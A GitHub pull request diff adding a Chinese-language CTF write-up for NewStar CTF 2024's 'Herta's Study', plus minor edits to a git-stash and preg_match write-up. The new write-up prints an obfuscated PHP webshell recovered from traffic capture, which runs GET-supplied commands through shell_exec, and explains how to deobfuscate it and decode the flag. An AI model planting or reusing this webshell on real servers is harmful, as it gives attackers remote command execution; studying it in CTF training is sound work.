Skip to content

Update week2 wp #26

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 12 commits into from
Oct 15, 2024
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
59 changes: 59 additions & 0 deletions docs/wp/2024/week2/misc/herta.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
---
titleTemplate: ':title | WriteUp - NewStar CTF 2024'
---
<script setup>
import Container from '@/components/docs/Container.vue'
</script>

# Herta's Study

<Container type='tip'>
本题考点:PHP 混淆,流量分析
</Container>

建议配合 unknown 师傅的前两道流量题食用

第七条流量是上传的 PHP 木马

```php
<?php
$payload=$_GET['payload'];
$payload=shell_exec($payload);
$bbb=create_function(
base64_decode('J'.str_rot13('T').'5z'),
base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRp
Kz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQo
gICAgfQ0KfQ0KcmV0dXJuICRuczs==')
);
echo $bbb($payload);
?>
```

可以搜索一下 `create_funtion()` 函数,解除混淆后得到加密代码

```php
$ns = base64_encode($ns);
for ($i = 0; $i < strlen($ns); $i += 1){
if ($i % 2 == 1) {
$ns[$i] = str_rot13($ns[$i]);
}
}
return $ns;
```

就是 Base64 后把奇数位 ROT13

解码反过来就行(第38条,`f.txt` 里的是真 flag,另一个是假 flag)

```php
<?php
$ns = 'ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==';
for ($i = 0; $i < strlen($ns); $i += 1){
if ($i % 2 == 1) {
$ns[$i] = str_rot13($ns[$i]);
}
}
echo base64_decode($ns);
// flag{sH3_i4_S0_6eAut1fuL.}
?>
```
8 changes: 4 additions & 4 deletions docs/wp/2024/week2/web/pangbai2.md
Original file line number Diff line number Diff line change
Expand Up @@ -58,11 +58,11 @@ git stash list

- `git stash`

保存当前工作进度,会把暂存区和工作区的改动保存起来。执行完这个命令后,在运行 `git status` 命令,就会发现当前是一个干净的工作区,没有任何改动。使用 `git stash save ``'一些信息``'` 可以添加一些注释。
保存当前工作进度,会把暂存区和工作区的改动保存起来。执行完这个命令后,在运行 `git status` 命令,就会发现当前是一个干净的工作区,没有任何改动。使用 `git stash save '一些信息'` 可以添加一些注释。

- `git stash pop [index] [stash_id]`
- `git stash pop [-index] [stash_id]`

从 Stash 中释放内容,默认为恢复最新的内容到工作区。
从 Stash 中释放内容,默认为恢复最新的内容到工作区。

:::

Expand Down Expand Up @@ -120,7 +120,7 @@ $_GET['NewStar_CTF.2024'] !== 'Welcome' && preg_match('/^Welcome$/', $_GET['NewS
如果加 `D` 修饰符,就不匹配换行符:

```python
preg_match('/^Welcome$/D',"Welcome\n")
preg_match('/^Welcome$/D', "Welcome\n")
```

:::
Expand Down
2 changes: 2 additions & 0 deletions theme-config.yml
Original file line number Diff line number Diff line change
Expand Up @@ -194,3 +194,5 @@ sidebar:
link: /wp/2024/week2/misc/xiaoming1
- text: 用溯流仪见证伏特台风
link: /wp/2024/week2/misc/futetaifeng
- text: Herta's Study
link: /wp/2024/week2/misc/herta